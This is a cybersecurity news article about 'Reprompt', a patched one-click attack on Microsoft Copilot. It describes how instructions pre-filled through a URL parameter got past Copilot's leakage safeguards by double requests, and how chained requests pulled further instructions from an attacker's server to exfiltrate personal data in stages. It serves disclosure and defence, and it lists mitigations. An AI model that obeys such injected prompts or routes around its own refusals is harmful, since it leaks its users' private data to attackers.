Microsoft Copilot Reprompt Attack Enables Stealthy Data Exfiltration

Reprompt is a one-click Microsoft Copilot attack that could enable silent data exfiltration, though Microsoft says it’s now patched.

Written By
thumbnail
Ken Underhill
Ken Underhill
Jan 14, 2026
eSecurity Planet content and product recommendations are editorially independent. We may make money when you click on links to our partners. Learn More

A newly disclosed attack technique called Reprompt shows how a single click could have been enough to quietly turn Microsoft Copilot into a personal data siphon — without plugins, added permissions, or any back-and-forth with the user. 

This technique can help threat actors bypass “… enterprise security controls entirely and accesses sensitive data without detection — all from one click,” said Varonis researchers.

How Reprompt Enables Silent Exfiltration

Reprompt stands out because it strips away the usual friction associated with AI-focused attacks. 

There’s no need for elaborate prompt engineering, malicious plugins, or convincing a user to copy and paste instructions into an assistant. 

Instead, the entire flow can begin with a single click on a legitimate Microsoft Copilot link, running inside the victim’s existing session context. 

Once triggered, Copilot effectively executes instructions on the user’s behalf — making the assistant itself the attack vehicle.

From there, attackers could potentially use Copilot to surface highly sensitive personal details, such as summaries of recently accessed files, location-related information, or upcoming travel plans. 

Researchers also found the behavior could persist even after the user closed the Copilot chat window, because the attack leveraged session-level context rather than relying on the chat remaining open. 

In other words, the interaction looked harmless at first glance, but the underlying workflow could continue quietly in the background.

Varonis noted that Reprompt differs from many other AI security issues because it doesn’t require user interaction beyond the initial click, and it doesn’t depend on installed integrations or enabled connectors. 

That makes it both easier to operationalize and harder to detect, since traditional warning signs — like suspicious prompts, obvious copy/paste behavior, or added permissions — may never appear.

Advertisement

The Techniques Behind Reprompt

From a technical standpoint, Reprompt chained together three techniques to achieve stealthy data exfiltration: 

  • Parameter-to-Prompt (P2P) injection
  • A double-request bypass
  • A chain-request mechanism that enabled continuous extraction.

First, the attack exploited Copilot’s q URL parameter, a common feature across AI platforms that lets a link automatically pre-fill a prompt. 

In Copilot’s case, this meant the attacker could embed instructions directly in the URL, so the prompt executed as soon as the page loaded — effectively turning a link click into a prompt submission.

Second, Reprompt used a double-request technique to work around built-in safeguards. Copilot has controls intended to reduce leakage, such as refusing questionable web requests or sanitizing sensitive data before returning it. 

However, Varonis observed that these protections appeared strongest on the first attempt. 

By instructing Copilot to repeat the same action twice and keep the “best” result, the attacker could sometimes get the second request to succeed even when the first was blocked or filtered.

Finally, the chain-request technique transformed the attack into a dynamic, multi-stage workflow. 

After the first step ran, Copilot could be prompted to fetch follow-up instructions from an attacker-controlled server. 

Each new instruction could be tailored based on what Copilot had already revealed, allowing the attacker to quietly collect information in stages while keeping the real intent hidden from the initial link and from client-side inspection.

Microsoft has confirmed the issue was patched as of Jan. 14, 2026, and Varonis reported that enterprise customers using Microsoft 365 Copilot were not affected.

Advertisement

Reducing AI Data Exfiltration Risk

Reprompt is a reminder that AI assistants introduce new risks that don’t always look like traditional phishing or malware. 

Even after a vendor patch, organizations still need layered controls to reduce the chance that a single click can trigger unexpected data access or quiet exfiltration. 

  • Treat AI deep links and auto-filled prompts as untrusted input, and ensure safeguards apply across repeated and chained requests.
  • Enforce strong identity and session protections, including MFA, conditional access, and shorter session timeouts.
  • Restrict Copilot access to managed devices and trusted networks using device compliance, location controls, and risk-based sign-in policies.
  • Reduce data exposure by applying least-privilege permissions, sensitivity labels, and DLP policies across Microsoft 365 content.
  • Strengthen web, email, and chat link defenses with URL scanning, domain filtering, and user warnings for suspicious AI links.
  • Monitor for unusual Copilot activity and validate incident response readiness with logging, alerting, and token revocation playbooks.

Collectively, these steps help shrink the blast radius of AI-driven attacks and strengthen overall resilience. 

Advertisement

The Risk of Trusted AI Access

Reprompt is an example of how AI assistants can become high-value targets when convenience features intersect with trusted access and persistent sessions. 

While Microsoft’s patch closes this specific gap, the broader lesson remains: organizations should treat AI tools like any other privileged system, with strong identity controls, tight data governance, and continuous monitoring to spot misuse early. 

As AI becomes more deeply embedded into daily workflows, reducing implicit trust and strengthening defense-in-depth will be essential to preventing one-click attacks from turning into silent data exposure. 

That need for stronger verification is fueling zero-trust adoption as organizations rethink how AI tools access sensitive data. 

thumbnail
Ken Underhill

Ken Underhill is an award-winning cybersecurity professional, bestselling author, and seasoned IT professional. He holds a graduate degree in cybersecurity and information assurance from Western Governors University and brings years of hands-on experience to the field.

Recommended for you...

AI Agent Safety Checklist
Girish Redekar
Mar 12, 2026
Fake OpenClaw npm Package Installs GhostClaw Malware
Ken Underhill
Mar 10, 2026
Fake Claude Code Install Pages Spread Infostealer Malware
Ken Underhill
Mar 10, 2026
CyberProof 2026 Report Warns of Rising Identity and AI Cyberattacks
Ken Underhill
Mar 6, 2026
eSecurity Planet Logo

eSecurity Planet is a leading resource for IT professionals at large enterprises who are actively researching cybersecurity vendors and latest trends. eSecurity Planet focuses on providing instruction for how to approach common security challenges, as well as informational deep-dives about advanced cybersecurity topics.

Property of TechnologyAdvice. © 2026 TechnologyAdvice. All Rights Reserved

Advertiser Disclosure: Some of the products that appear on this site are from companies from which TechnologyAdvice receives compensation. This compensation may impact how and where products appear on this site including, for example, the order in which they appear. TechnologyAdvice does not include all companies or all types of products available in the marketplace.